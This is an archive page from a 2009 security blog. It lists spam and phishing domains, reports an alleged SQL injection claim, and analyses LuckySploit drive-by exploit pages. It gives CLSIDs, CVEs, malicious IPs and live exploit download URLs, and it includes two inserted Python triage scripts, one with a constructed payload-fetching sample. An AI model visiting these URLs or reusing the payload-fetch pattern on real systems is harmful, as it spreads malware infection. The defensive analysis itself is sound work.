Showing newest 18 of 37 posts from October 2009. Show older posts

Friday, October 30, 2009

Spam ** 30-Oct

Spam links from my inbox

http://www.iqbgwrue.cn
http://www.ipuiubue.cn
http://yozninext.com/
http://www.barafcp.cn
http://www.kulagqz.cn
http://optin.fanbox.com
http://xikugsc.cn
http://www.buwonjv.cn
http://www.sumavys.cn
http://www.iblmbdue.cn
http://yozninext.com
http://www.onzxckea.cn
http://xikugsc.cn/
http://www.qejindj.cn
http://www.yoxufog.cn
http://www.omjpvvea.cn
http://kayupyp.cn
http://www.zilazon.cn
http://kayupyp.cn
http://www.opqzrlea.cn
http://www.ikfysaue.cn
http://www.gubobos.cn
http://www.nuzopeh.cn
http://www.iypjvgue.cn
http://0rj3op.taficpk.cn
http://9kaps.uecawsnr.cn
http://bd00c.toqorcy.cn
http://7e1c1.jehegyc.cn
http://0c77e.ratalcj.cn
http://c503.wiriccq.cn
http://than.wucidxg.cn
http://f8d5.togovys.cn
http://dd005.gocofgr.cn
http://6f8.josayjr.cn
http://6d03bb.mukaktl.cn
http://12cf.nupaqjv.cn
http://6d208.bomavpf.cn
http://invitel.hu/frstcchl/3.html
http://de72.zohorsc.cn
http://0ac39d.zohorsc.cn

Thursday, October 29, 2009

Fake Malaysia Maybank Website - Phishing

A reader sent me an email about fake websites imitating Maybank, the largest bank in her country, Malaysia. She would like to share them with the readers who come here.



Phishing websites:
hxxp://sebastianschaper.net/aegabi06/cache/May2u-Service/Maybank2u_com.html
hxxp://tradewindcay.com/images/Internet-Customer/Maybank2u.html


IP Address: 62.140.23.135

Domains sharing same IP address:

*.bierhaus79cent.com
*.days-of-defeat.com
*.direct-headhunter.com
*.direkt-headhunter.com
*.freesurfmag.com
*.geniale-geldquelle.de
*.hardcore-basicwear.com
*.hardcorebasicwear.com
*.papenrode.com
*.rank-records.com
*.ruhoglu.com
*.sanjoes.com
*.smoothlights.com
*.urnatur.com
*.wertholz-handel.com
*.wertholzhandel.com
*.wwwsk-gaming.com
*.xlixi.com
*.ziami-business-marketing.com
alex-treff.com
alwaysdollar.com
architekturverlag.com
b-waren.com
beauty-date.com
bidilicious-records.com
bierhaus79cent.com
bosporos.net
business-language-support.com
chiacanemondo.com
crazypinup.com
das-ginge.com
days-of-defeat.com
deadlyviperassassinationsquad.com
der-naturgarten.com
dineia.com
direct-headhunter.com
direkt-headhunter.com
elbetaler.com
enterprise-buisness.com
excedense.com
feuerloescher-tv.com
fostaclicc.com
freesurfmag.com
friseurmeisterin.com
fruehgeburt.com
geniale-geldquelle.de
hardcore-basicwear.com
hardcorebasicwear.com
hocazade.net
hyde-undead.com
influenzapandemie.com
isotecs.com
just-fx.com
knowledgediscoverer.com
langerle.com
mail.alex-treff.com
mail.bierhaus79cent.com
mail.bosporos.net
mail.crazypinup.com
mail.direct-headhunter.com
mail.direkt-headhunter.com
mail.freesurfmag.com
mail.geniale-geldquelle.de
mail.hardcore-basicwear.com
mail.hocazade.net
mail.mariavit.com
mail.panmental.com
mail.papenrode.com
mail.rank-records.com
mail.relaxdivers.com
mail.relaxdivers.net
mail.ruf-wilhelmshaven.net
mail.ruhoglu.com
mail.sanjoes.com
mail.sebastianschaper.net
mail.smoothlights.com
mail.teamspeak-showtime.de
mail.urnatur.com
mail.wertholz-handel.com
mail.wertholzhandel.com
mail.wwwsk-gaming.com
mail.xlixi.com
mail.ziami-business-marketing.com
mariavit.com
mc-loft.com
mediaontour.com
meseth.com
michael-neefe.com
mysaptuning.com
noal-entertainment.com
o3-bar.com
p201b.user.evanzo-server.de
panmental.com
papenrode.com
peermedien.com
projektblog.com
rank-records.com
reise06.com
relaxdivers.com
ruf-wilhelmshaven.net
ruhoglu.com
schweizer-bauen.com
schweizerbauen.com
sebastianschaper.net
seniorexpertnet.com
sex-stars-nackt.com
showtime.teamspeak-showtime.de
sientec.com
stelmacher.com
tanz-mit.com
teamspeak-showtime.de
textexport.com
the-dark-sun.com
urnatur.com
wertholz-handel.com
wertholzhandel.com
wwwsk-gaming.com
x-citer.com
xlixi.com
ziami-business-marketing.com
zupanet.com


IP Address: 76.163.230.210

Domains sharing same IP address:

*.tradewindcay.com
tradewindcay.com
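Both phishing pages above share one pattern: the bank's name sits in the path (May2u-Service/Maybank2u_com.html, Internet-Customer/Maybank2u.html) while the host is an unrelated compromised site. As an added example, not code from this post, here is a small Python triage helper that applies that heuristic: it accepts defanged hxxp:// URLs as written in the post, and flags a URL when a brand token appears in the path or query (or in the hostname of a lookalike) but the host is not one of the brand's own domains. The BRAND_DOMAINS table is an assumption for the example and must be replaced with the domains the bank actually publishes; the sample URLs other than the two quoted from the post, and the login-verify.invalid host, are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumption for this example: the brand's legitimate registered domains.
# Replace with the domains the bank actually publishes before relying on it.
BRAND_DOMAINS = {
    "maybank2u": ("maybank2u.com.my", "maybank.com.my"),
}


def refang(url: str) -> str:
    """Restore 'hxxp://' / 'hxxps://' defanging so urlsplit can parse the URL."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url.strip(), flags=re.IGNORECASE)


def host_matches(host: str, domain: str) -> bool:
    """True if host is the domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def _normalise(text: str) -> str:
    # Phishing paths often write the brand as Maybank2u_com or maybank-2u;
    # collapse separators so the token check still matches.
    return re.sub(r"[-_.\s]", "", text.lower())


def classify(url: str) -> dict:
    """Classify one URL as 'brand_in_host', 'brand_in_path' or 'ok'."""
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    path = _normalise(parts.path + "?" + parts.query)
    for brand, domains in BRAND_DOMAINS.items():
        if any(host_matches(host, d) for d in domains):
            continue  # the brand's own site may mention its name anywhere
        if brand in _normalise(host):
            return {"url": url, "host": host, "brand": brand, "verdict": "brand_in_host"}
        if brand in path:
            return {"url": url, "host": host, "brand": brand, "verdict": "brand_in_path"}
    return {"url": url, "host": host, "brand": None, "verdict": "ok"}


def suspicious(urls) -> list:
    """Return the classifications of every URL that is not 'ok', in input order."""
    return [c for c in map(classify, urls) if c["verdict"] != "ok"]


# Constructed sample: the two URLs quoted in the post, one legitimate URL
# (under the assumed brand domain) and one constructed lookalike host.
SAMPLE_URLS = [
    "hxxp://sebastianschaper.net/aegabi06/cache/May2u-Service/Maybank2u_com.html",
    "hxxp://tradewindcay.com/images/Internet-Customer/Maybank2u.html",
    "https://www.maybank2u.com.my/",
    "http://maybank2u.com.my.login-verify.invalid/",
]

if __name__ == "__main__":
    for finding in suspicious(SAMPLE_URLS):
        print(f"{finding['verdict']:14} {finding['host']:40} {finding['url']}")
```

The heuristic is deliberately one-sided: a miss (the brand's own site) is never flagged, and a hit only says "look at this", which is the right trade-off for a mailbox or proxy-log sweep where the cost of a false positive is a few seconds of analyst time.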

Wednesday, October 28, 2009

MSN Messenger Block Checker - Phishing



IP Address: 121.54.174.85

Domains sharing same IP address:

fq4xnx.see-they-blocked-me.com
www.ooo-seems-im-blocked.com
ahem-they-blocked-me.com
cindrella-blocked-me.com
damnn-they-blocked-me.com
did-they-block-you.com
face-blocked-truth.com
find-reason-of-being-blocked.com
finding-who-blocks.com
friends-block-buddies.com
grab-block-status.com
grab-my-block-status.com
have-they-blocked-you.com
heroes-never-block.com
how-come-they-block-me.com
im-fedup-of-being-blocked.com
im-sad-im-blocked.com
ima-checking-block-status.com
jesus-he-blocked-us.com
kephsa.why-do-they-block.com
lame-friends-block-you.com
leme-check-block-status.com
mean-friends-block.com
mjzfx0.why-do-they-block.com
no-damn-way-im-blocked.com
notice-they-blocked-u.com
oh-i-was-blocked.com
omg-they-blocked-me.com
phew-they-blocked-me.com
phewww-seems-i-am-blocked.com
puff-im-blocked.com
pwdgds.grab-my-block-status.com
sad-i-was-blocked.com
tchv9l.find-reason-of-being-blocked.com
they-were-haha.com
ufff-i-was-blocked.com
urr-he-blocked-us.com
weird-i-was-blocked.com
who-let-me-block.com
why-do-they-block.com
why-my-friends-block.com
wooh-im-blocked.com
www.ahem-they-blocked-me.com
www.ahh-im-blocked.com
www.damn-im-blocked.com
www.damnn-they-blocked-me.com
www.did-they-block-you.com
www.duh-i-got-blocked.com
www.face-blocked-truth.com
www.finding-who-blocks.com
www.friends-block-buddies.com
www.grab-my-block-status.com
www.have-they-blocked-you.com
www.hey-you-block-me.com
www.how-come-they-block-me.com
www.im-fedup-of-being-blocked.com
www.im-sad-im-blocked.com
www.ima-checking-block-status.com
www.jealoused-people-block.com
www.jesus-he-blocked-us.com
www.jesus-im-blocked.com
www.lame-friends-block-you.com
www.leme-check-block-status.com
www.let-people-laugh.com
www.let-them-hehe.com
www.mean-friends-block.com
www.my-block-status-check.com
www.my-friends-block-me.com
www.my-mates-blocked-me.com
www.no-damn-way-im-blocked.com
www.notice-they-blocked-u.com
www.oh-i-was-blocked.com
www.ohh-ma-friend-blocked-me.com
www.omg-they-blocked-me.com
www.phew-they-blocked-me.com
www.puff-im-blocked.com
www.query-block-status.com
www.sad-i-was-blocked.com
www.see-they-blocked-me.com
www.they-were-haha.com
www.ufff-i-was-blocked.com
www.urr-he-blocked-us.com
www.weird-i-was-blocked.com
www.who-let-me-block.com
www.why-do-they-block.com
www.why-i-got-blocked.com
www.why-my-friends-block.com
www.wooh-im-blocked.com
www.ooo-seems-im-blocked.com
see-they-blocked-me.com
fq4xnx.see-they-blocked-me.com

Tuesday, October 27, 2009

Researcher discloses SQL Injection flaw on barackobama.com

Reference: thetechherald.com

Update:

Jascha Franklin-Hodge, CTO at Blue State Digital, responded to our earlier questions with the following.

"As we treat all security issues with the utmost seriousness, we have been working closely with Organizing for America to investigate this alleged SQL injection problem. After careful review, we are confident that the screenshot included in this bug does not contain any data from the barackobama.com site or any other site hosted by Blue State Digital, the DNC, or Organizing for America."

"The screenshot, per the "KeyWord" box, appears to be related to a "Roosevelt University Calendar Events," not a site that is hosted by Blue State Digital, nor connected with barackobama.com. Microsoft Access is not used in any capacity on the barackobama.com site or servers."

This statement only adds a little more weight to our earlier assumption. Unu has apparently accessed a database on the same server that is unrelated to President Obama’s site. We’ve asked Blue State Digital to confirm if this is in fact the case.

If so, we asked why an SQLi from President Obama's site allowed access to the Access database.

The answer given was firm, "There is no SQL injection issue on our servers or those hosting/related to the barackobama.com site. We do not run Microsoft Access anywhere in our organization, nor do we (or DNC/OFA) run or host to any calendar at Roosevelt University."

It was suggested that we talk to Unu, who made the allegation in the first place. We've done so and if we hear back, we'll update this story again.

Original Article:

Unu, the researcher responsible for several site vulnerability disclosures in the past, says there are SQL Injection (SQLi) flaws on barackobama.com. He said these flaws allowed him to access usernames and passwords used on the President's domain. At the same time, the DNC disagrees with him, saying that the information provided is based on incorrect assertions.

According to the blog post by Unu, an unsecured parameter in President Obama’s personal domain leads to the SQL Injection, allowing access to the database on the server. Interestingly enough, the database accessed in his example was a MS Access database. MS Access is a database format often rejected by developers on massive Web projects.

“We have a table admin. And in this table we can see that the admin passwords are in PLAIN TEXT! The website is big, with many sections, and there are 19 admins. What else we need to get full access on the website? Nothing. After we log in as admins, we can virtually do anything we want with the website: upload PHPShells, redirects, infect pages with Trojan droppers, [and even deface the whole website],” Unu wrote.

Continue...

Spam Computer-Antivirus19.com, 12scanner.com ** 27-Oct-09

IP Address: 85.17.138.27

Domains sharing same IP address:

check-your-iq.ru
age-bio.ru
age-ega.ru
age-info.ru
agebee.ru
ageegle.ru
aggge.ru
b-i-o-v.ru
before-life.ru
beofree.ru
bestage.ru
bio-v.ru
bio-vozrast.ru
bionaft.ru
biovoz.ru
brynetka.ru
dedlife.ru
dub-dubom.ru
former-life.ru
formerlife.ru
hochesh-li.ru
icq-mobila.ru
icq-tel.ru
icqtel.ru
iq-iq.ru
iqste.ru
last-another-life.ru
last-life.ru
lifoon.ru
medical-static-center.ru
neupadi.ru
nokiaicq.ru
offiget.ru
on-liffe.ru
open-life.ru
previous-life.ru
professional-test.ru
qiiiq.ru
russkitrax.ru
some-other-life.ru
soul-in-you.ru
soulinyou.ru
styleicq.ru
superorgazm.ru
svestnik.ru
telicq.ru
test-health.ru
test-medicine.ru
testbio.ru
the-past.ru
theprevious.ru
what-is-your-iq.ru
www.goored.com
www.karaokeplus.info
you-bio.ru
your-bio.ru
your-great-mind.ru
yourbio.ru

IP Address: 85.17.237.5

Domains sharing same IP address:

*.forbookings.com
*.mail.forbookings.com
*.mybetorwager.cn
*.udta.in
39u.ru
3b4.ru
3cw.ru
a3j.ru
a3l.at
a3l.ru
a5f.at
a5g.ru
a5h.ru
a5i.at
a5j.at
a5j.ru
a5l.at
a5m.at
a8d.ru
aamelkov.hobby-site.com
age-age.ru
age-bio.ru
agebee.ru
ageegle.ru
agend.ru
autobestwestern.cn
b5z.ru
b6l.at
b6t.at
b7g.at
b7g.ru
b8o.ru
b9g.ru
beeeo.ru
beeoo.ru
bigtopliteworld.cn
bio-oib.ru
bio-tube.ru
bio-v.ru
biozavr.ru
biozov.ru
bitest.ru
c1z.at
c1z.ru
c5y.at
c7r.at
c8b.ru
c8k.ru
c9u.ru
ce5.ru
ciqx.in
coolnamemart.cn
dub-dubom.ru
f5l.at
f5x.at
f7y.ru
f8a.ru
findbigthinker.cn
forbookings.com
gasa.in
giantnonfat.cn
hugetopnonfat.cn
iletisim.hopto.org
inhouselabel.cn
inother.ru
iq-mozgi.ru
iqdoza.ru
kburmenko.go.dyndns.org
life-before.ru
liteautoexcellent.cn
litefinestdirect.cn
litetopfindguide.cn
liteupyourride.cn
lotante.cn
lotmachinesguide.cn
mail.forbookings.com
nanotopdiscover.cn
nonfathighestlocate.cn
operations.serveftp.com
past-another-life.ru
pornishe.ru
previous-life.ru
professional-test.ru
q0w.ru
q5v.ru
red-wolf.ru
russkitrax.ru
superorgazm.ru
t-age.ru
test-health.ru
the-previous.ru
theanotherlife.ru
u1l.ru
u1x.ru
u3h.ru
u6v.ru
u7e.ru
u8i.ru
udta.in
uppd.in
www.bigtopmanagement.cn
www.finditinbigapple.cn
www.forbookings.com
www.mail.forbookings.com
x0v.ru
x3b.ru
x6i.ru
x7d.ru
x9f.ru
x9u.ru
x9v.ru
x9w.ru
xe6.ru
xh3.ru
xj4.ru
xk9.ru
xv8.ru
yourbio.ru
yourlitetopfind.cn
yournamequickshop.cn
zdlz.in

IP Address: 91.121.24.139

Domains sharing same IP address:
*.a3j.ru
*.a5j.ru
*.a5l.at
*.agebio.ru
*.b3a.ru
*.b5r.ru
*.b6l.at
*.b7p.ru
*.b9g.at
*.beage.ru
*.beo-free.ru
*.bestbeo.ru
*.bi-test.ru
*.bio-free.ru
*.bionaft.ru
*.biovoz.ru
*.c1z.ru
*.c6p.at
*.c7r.at
*.c8k.ru
*.c8t.at
*.ce5.at
*.f5x.at
*.f5x.ru
*.f7g.ru
*.f7y.at
*.last-life.ru
*.soul-in-you.ru
*.uppd.in
*.xj4.ru
*.xv8.ru
*.you-bio.ru
*.youbio.ru
*.your-age.ru
18-plus.ru
39u.ru
3b4.ru
a3j.ru
a3l.at
a3l.ru
a5f.at
a5g.ru
a5j.ru
a5l.at
a5m.at
a8d.ru
agebio.ru
ageee.ru
ageend.ru
ageinf.ru
b5z.ru
b6l.at
b6t.at
b7g.at
b8o.ru
b9g.ru
beage.ru
beeeo.ru
beeoo.ru
bestbeo.ru
bio-free.ru
bio-z.ru
c1z.at
c1z.ru
c5y.at
c7r.at
c8b.ru
c8k.ru
c9u.ru
ce5.ru
cedric-guduff.com
check-your-iq.ru
dima-bilan-gey.ru
f5l.at
f5x.at
f7y.ru
f8a.ru
formerlife.ru
iq-mozgi.ru
iqdoza.ru
ks24667.kimsufi.com
lekiss.net
liteautoexcellent.cn
off-life.ru
past-another-life.ru
pornishe.ru
q5v.ru
roxane-sara.com
roxane-sara.net
roxanesara.com
roxanesara.net
roxyblog.net
sex-finish.ru
sexfinish.ru
soul-in-you.ru
t-age.ru
test-medicine.ru
testoid.ru
thomasmenga.com
tiqt.ru
u1l.ru
uppd.in
www.a3j.ru
www.a3l.ru
www.b3a.ru
www.b6l.at
www.b9g.at
www.bigtopliteworld.cn
www.c6y.at
www.c7r.at
www.c8k.ru
www.dub-dubom.ru
www.litehitscar.cn
www.mymixwager.cn
www.thebettings.cn
xj4.ru
xk9.ru
xv8.ru
your-age.ru
your-great-mind.ru

IP Address: 91.121.167.41

Domains sharing same IP address:

*.a5f.at
*.a5m.ru
*.b5r.at
*.bqtl.in
*.findbigshots.cn
*.nanotopdiscover.cn
*.oaty.in
*.q0a.ru
*.q1k.ru
*.superorgazm.ru
*.u0s.in
*.xb5.ru
*.xc8.ru
18-plus.ru
a5f.ru
a5i.ru
age-t.ru
b5r.at
b6l.ru
bigtopbrands.cn
bigtoprocks.cn
bio-a.ru
c5e.at
c6y.ru
creativeblockplay.cn
f6e.at
f7p.at
f9a.at
filmoflife.cn
findyourbigidea.cn
gasa.in
gianthighest.cn
gzpf.in
hugebestbuys.cn
jumbobestrate.cn
jxsb.in
kbgg.in
ks361128.kimsufi.com
litehighestmodel.cn
litetopdiscoversite.cn
litetopseeksite.cn
lotmachinesguide.cn
martpictureexistence.cn
mediahomenameshopmovie.cn
mixbetonline.cn
mixgrouptravel.cn
namegamestore.cn
namemartfilmlife.cn
ns6.bestlitediscover.cn
playslotbet.cn
powermixplay.cn
q0a.ru
q0i.ru
q0j.ru
q0k.ru
q1k.ru
q3b.ru
q3e.ru
q47.ru
q5a.ru
q5k.ru
rnfs.in
shopfilmlifeonline.cn
shopmoviefestival.cn
shoponlinefilmsite.cn
shopvideocommission.cn
spzr.in
superbetsports.cn
superdietfind.cn
thebestwaytofind.cn
thelitelocate.cn
themixbet.cn
u0b.ru
u0c.ru
u0t.ru
u1m.ru
u1w.ru
u1y.ru
u3w.ru
u3y.ru
u6d.ru
u6k.ru
u6n.ru
u7p.ru
u7x.ru
u8b.ru
u9j.ru
www.a3h.ru
www.a3j.at
www.a3l.at
www.a5f.at
www.a5h.at
www.a5h.ru
www.a5i.at
www.a5j.at
www.a5j.ru
www.a5m.at
www.atxh.in
www.bigpremiumlite.cn
www.bigtopfindsite.cn
www.bqtl.in
www.coolnamemart.cn
www.f5l.ru
www.shopfilmlifescience.cn
www.shopmovielife.cn
www.u0s.in
www.u6l.ru
www.u7f.ru
www.u9a.in
www.x9m.ru
www.yourfilmlife.cn
x6q.ru
x6r.ru
x8b.ru
x8f.ru
x8m.ru
xb5.ru
xg9.ru
xj7.ru
xq0.ru
yourfilmlife.cn

IP Address: 94.75.198.241

Domains sharing same IP address:

*.cmshop.dk
2a.cmshop.dk
911test.ru
age-inf.ru
age-t.ru
bestbio.ru
biersted.net
check-your-iq.ru
cmshop.dk
dima-bilan-gey.ru
grubi.ru
intelq.ru
lifezilla.ru
mail.biersted.net
mail.cmshop.dk
onelifebefore.ru
partnertest.net
pornomig.ru
samsungicq.ru
sex-finish.ru
sexfinish.ru
test-death.ru
testodrome.ru
testoid.ru
testometr.ru
yaiq.ru

IP Address: 89.248.174.58

Domains sharing same IP address:

12scanner.com
allaboutentourage.com
chupachupsorg.com
computer-antivirus19.com
eric-clapton2009.cn
ns2.wempowa.com
the-offspring.cn


Inactive domains:

mycomputerbestscan11.com
mycomputerfastscan11.com
www.my-garden-state.com
iron-mit-wine.com

Advanced Virus Remover with LuckySploit ** hxxp://morning1.cn

SEO poisoning is a common technique used to spread rogue AV software. Usually this type of attack is coupled with keywords for a big current event or related terms. What I found today was totally different from the common behaviour described on various security blogs.

Upon visiting the rogue AV site, users are no longer presented with the standard fake scanner page that pushes them to download the rogue AV software. A new method installs it on the user's system directly, without any user interaction. The user's desktop wallpaper is changed to read "YOUR SYSTEM IS INFECTED", and a red icon appears in the tray icon panel.



What happens behind the scenes is that visiting the compromised website redirects to the LuckySploit site.


After De-obfuscating


The redirector with hostname "morning1.cn" redirects to a LuckySploit page that looks similar to this.

Obfuscated code

First layer - De-obfuscate

Second layers - De-Obfuscate

CLSIDs found:

- BD96C556-65A3-11D0-983A-00C04FC29E30
- BD96C556-65A3-11D0-983A-00C04FC29E36 (MS06-014)
- AB9BCEDD-EC7E-47E1-9322-D4A210617116 (MDAC Vulnerability)
- 0006F033-0000-0000-C000-000000000046
- 0006F03A-0000-0000-C000-000000000046
- 6e32070a-766d-4ee6-879c-dc1fa91d2fc3
- 6414512B-B978-451D-A0D8-FCFDF33E833C
- 7F5B7F63-F06F-4331-8A26-339E03C0AE3D
- 06723E09-F4C2-43c8-8358-09FCD1DB0766
- 639F725F-1B2D-4831-A9FD-874847682010
- BA018599-1DB3-44f9-83B4-461454C84BF8
- D0C07D56-7C69-43F1-B4A0-25F5A11FAB19
- E8CCCDDF-CA28-496b-B050-6C07C962476B (CVE-2007-0717)
- 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF (CVE 2008-0015)


MS Office Web Components Spreadsheet (OWC10.Spreadsheet Exploit)

Once the system is detected to contain a vulnerability, the JavaScript containing the malware download links "Setup.exe" and "go.jpg" is triggered. "Setup.exe" currently has a detection rate of about 2.44 percent on VirusTotal. :(


"go.jpg" currently has a detection rate of about 7.32 percent on VirusTotal and contains code like the one below.



Finally, another two malware files, the rogue AV "SetupAdvancedVirusRemover.exe" and "dfghfghgfj.dll", are downloaded to the system. The samples score 48.79 percent and 63.42 percent on VirusTotal respectively.
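The CLSID lists in this post and in the jeanietomanek.com post below are the part of a LuckySploit page that survives de-obfuscation unchanged, which makes them the natural thing to key a triage script on. Here is an added Python example (my addition, not code from this post or from the exploit kit) that scans de-obfuscated script text for those CLSIDs, the ProgIDs it hands to ActiveXObject (such as OWC10.Spreadsheet), and quoted download URLs, so an analyst sees at a glance which components a page probes and what it fetches. The labels are copied from the two lists in this post; the sample script, the exploit-host.invalid hostname and the function names are constructed for the example.

```python
import re

# CLSIDs as listed in this post and the jeanietomanek.com post, with the
# labels the posts attach to them. An empty label means the post lists the
# CLSID without naming the issue.
KNOWN_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36": "MS06-014",
    "AB9BCEDD-EC7E-47E1-9322-D4A210617116": "MDAC vulnerability",
    "E8CCCDDF-CA28-496B-B050-6C07C962476B": "CVE-2007-0717",
    "02BF25D5-8C17-4B23-BC80-D3488ABDDC6B": "CVE-2007-0717",
    "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF": "CVE-2008-0015",
    "FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6": "CVE-2007-6250",
    "527196A4-B1A3-4647-931D-37BA5AF23037": "CVE-2006-0003",
    "D27CDB6E-AE6D-11CF-96B8-444553540000": "CVE-2006-0003",
    "BD96C556-65A3-11D0-983A-00C04FC29E30": "",
    "0006F033-0000-0000-C000-000000000046": "",
    "0006F03A-0000-0000-C000-000000000046": "",
    "6E32070A-766D-4EE6-879C-DC1FA91D2FC3": "",
}

CLSID_RE = re.compile(r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}")
PROGID_RE = re.compile(r"ActiveXObject\s*\(\s*['\"]([A-Za-z0-9_.]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+?\.(?:exe|dll|jpg)(?=[\s'\"<>]|$)", re.IGNORECASE)


def triage(script: str) -> dict:
    """Summarise what a de-obfuscated exploit page probes and fetches."""
    clsids, seen = [], set()
    for m in CLSID_RE.finditer(script):
        clsid = m.group(0).upper()          # braces and case vary between kits
        if clsid in seen:
            continue
        seen.add(clsid)
        clsids.append({
            "clsid": clsid,
            "listed": clsid in KNOWN_CLSIDS,  # appears in the posts' lists
            "label": KNOWN_CLSIDS.get(clsid, ""),
        })
    # dict.fromkeys keeps first-seen order while de-duplicating
    progids = list(dict.fromkeys(PROGID_RE.findall(script)))
    urls = list(dict.fromkeys(m.group(0) for m in URL_RE.finditer(script)))
    return {"clsids": clsids, "progids": progids, "urls": urls}


def report(script: str) -> str:
    """Human-readable report, one finding per line."""
    t = triage(script)
    lines = []
    for c in t["clsids"]:
        tag = c["label"] or ("listed, unlabelled" if c["listed"] else "not in list")
        lines.append(f"CLSID {c['clsid']} ({tag})")
    lines += [f"ProgID {p}" for p in t["progids"]]
    lines += [f"Download {u}" for u in t["urls"]]
    return "\n".join(lines)


# Constructed sample modelled on the shape described in the post (braced and
# mixed-case CLSID strings, a ProgID instantiation, quoted download links).
# It is not the real exploit code and the hostname is a placeholder.
SAMPLE_SCRIPT = r'''
var a = "{bd96c556-65a3-11d0-983a-00c04fc29e36}";
var b = "AB9BCEDD-EC7E-47E1-9322-D4A210617116";
var o = new ActiveXObject("OWC10.Spreadsheet");
var payload = "http://exploit-host.invalid/Setup.exe";
var img = 'http://exploit-host.invalid/go.jpg';
var flash = "d27cdb6e-ae6d-11cf-96b8-444553540000";
'''

if __name__ == "__main__":
    print(report(SAMPLE_SCRIPT))
```

One caveat when reading the output: D27CDB6E-AE6D-11CF-96B8-444553540000 is the Shockwave Flash control and appears in countless benign pages, so on its own it is a weak signal; an exploit-kit page is recognised by the whole set of CLSIDs together, not by any single one.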


Malicious IP address involved:
- morning1.cn - 91.212.198.152 (Russia)
- coolcount1.com - 91.207.116.55
- downloadavr7.com- 91.207.116.55

Domains sharing same IP address: 91.212.198.152

morning1.cn
homut1.cn
morning1.cn
scan-your-pc.cn
www.morning1.cn
yt6tyg.cn


Domains sharing same IP address: 91.207.116.55

10-open-davinci.com
advanced-virus-remover-2009.com
advanced-virusremover-2009.com
advanced-virusremover2009.com
advancedvirusremover-2009.com
best-scan-pc.com
best-scanpc.com
best-scanpc.net
best-scanpc.org
cathrynzfunz.com
coolcount1.com
downloadavr6.com
downloadavr7.com
mail.10-open-davinci.com
mail.advanced-virus-remover-2009.com
mail.advanced-virusremover2009.com
mail.best-scan-pc.com
mail.best-scanpc.org
mail.cathrynzfunz.com
mail.coolcount1.com
mail.downloadavr6.com
mail.downloadavr7.com
mail.hard-xxx-tube.com
mail.testavrdown.com
mail.xxx-white-tube.net
testavrdown.com
www.advanced-virus-remover-2009.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com
xxx-white-tube.net

Thanks,

--X0end

Monday, October 26, 2009

www.africacareerguidance.com

Africacareerguidance main page.


Source Code:


Download link:



crack_1_.45155.exe (Virustotal 6/41)

crack_2_.45155.exe (Virustotal 6/41)


Saturday, October 24, 2009

jeanietomanek.com compromised to host luckysploit

A reader sent me an email saying that "jeanietomanek.com" was compromised to host multiple exploit codes, and that it also contains a link redirecting to another exploit site.

_vti_bin/nav_links.php

First layer - De-obfuscated code "nav_links.php"

Second layer- De-obfuscated code "nav_links.php"


From the second-layer de-obfuscated code, there are a few URL links:

- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKYgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKKYK
- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKWgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKYK (DirectShow 0Day)
- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKWgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKKe (QuickTime)
- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKYgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKKjK
- http://tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKWgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKWS (PDF Exploit) VirusTotal (4/41)


Analysing the malicious PDF on its own leads nowhere, because there is a separate function that only becomes visible after the second-layer de-obfuscation. This makes the analysis work harder. A vulnerable Adobe PDF reader crashes when opening the PDF file, and it downloads malware to the system that is detected by most anti-virus engines (VirusTotal 38/41).

From the second layer, this code obviously launches multiple exploits in one page. And it seems exploiting is not enough: it then redirects to "tapiroten.info".

- tapiroten.info/lin.cgi?jzo
- tapiroten.info/lin.cgi?XceKRRySKWKKZKeKKKgYluSiFWKeKRWlclXuKYlYcYWieSZZKYeFeRYlSFSjKKKKKKKKKK
- tapiroten.info//lin.cgi?XceKRRySKWKKZKeKKYgYluSiFWKeKRWlclXuKYlYcYWieFKKKYKyKXKKKKKKKKKYK0 (exe) VirusTotal (23/41)

- tapiroten.info/lin.cgi?jzo


De-obfuscated code:

CLSID found:

- BD96C556-65A3-11D0-983A-00C04FC29E36 (MS06-014)
- 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF (CVE 2008-0015)
- 02BF25D5-8C17-4B23-BC80-D3488ABDDC6B (CVE-2007-0717)
- FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6 (CVE-2007-6250)
- AB9BCEDD-EC7E-47E1-9322-D4A210617116 (MDAC Vulnerability)
- BD96C556-65A3-11D0-983A-00C04FC29E3o
- BD96C556-65A3-11D0-983A-00C04FC29E36
- 0006F033-0000-0000-C000-000000000046
- 0006F03A-0000-0000-C000-000000000046
- 6e32070a-766d-4ee6-879c-dc1fa91d2fc3
- 6414512B-B978-451D-A0D8-FCFDF33E833C
- 7F5B7F63-F06F-4331-8A26-339E03C0AE3D
- 06723E09-F4C2-43c8-8358-09FCD1DB0766
- 639F725F-1B2D-4831-A9FD-874847682010
- BA018599-1DB3-44f9-83B4-461454C84BF8
- D0C07D56-7C69-43F1-B4A0-25F5A11FAB19
- E8CCCDDF-CA28-496b-B050-6C07C962476B
- 527196a4-b1a3-4647-931d-37ba5af23037 (CVE-2006-0003)
- d27cdb6e-ae6d-11cf-96b8-444553540000 (CVE-2006-0003)

Malicious IP address involved:
- jeanietomanek.com - 216.39.57.106
- tapiroten.info - 216.150.79.76
- 216.155.153.212
- 174.139.241.2
- 209.31.180.144

